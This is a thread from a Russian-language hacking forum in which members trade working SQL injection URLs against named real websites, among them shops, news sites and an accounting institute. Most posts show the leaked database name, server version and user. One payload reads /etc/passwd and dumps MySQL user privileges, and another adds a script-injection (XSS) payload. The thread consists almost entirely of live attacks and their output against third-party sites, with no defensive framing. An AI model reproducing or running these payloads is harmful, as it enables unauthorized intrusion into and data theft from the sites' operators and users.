SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|ininterne1_stan@192.168.1.41

    какой то испанский шоп
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
  2. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
    
    db_eircicai|5.5.51|koresoft@localhost

    и XSS тут же
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
    
     
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,388
    Reputations:
    53
    Это называется SiXSS
     
    ms13 likes this.
  4. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
     
    BabaDook likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,550
    Likes Received:
    398
    Reputations:
    230
    Code:
    http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
     
    BabaDook likes this.
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    262
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
     
    BenderMR likes this.
  7. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    47
    Likes Received:
    5
    Reputations:
    1
    Code:
    https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
     
    BenderMR likes this.
  8. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    MegaKeys.RU
    Code:
    https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
     
    RedHazard likes this.
  9. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    Code:
    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
     
    BenderMR likes this.
  10. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    23
    Reputations:
    10
    BChainHacks
    Code:
    https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
    bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
     
  11. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    125
    Likes Received:
    334
    Reputations:
    18
    Code:
    www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
    
    5.5.52-MariaDB
    Code:
    https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
    
    5.5.61-0ubuntu0.14.04.1-log
    Code:
    https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
     
Loading...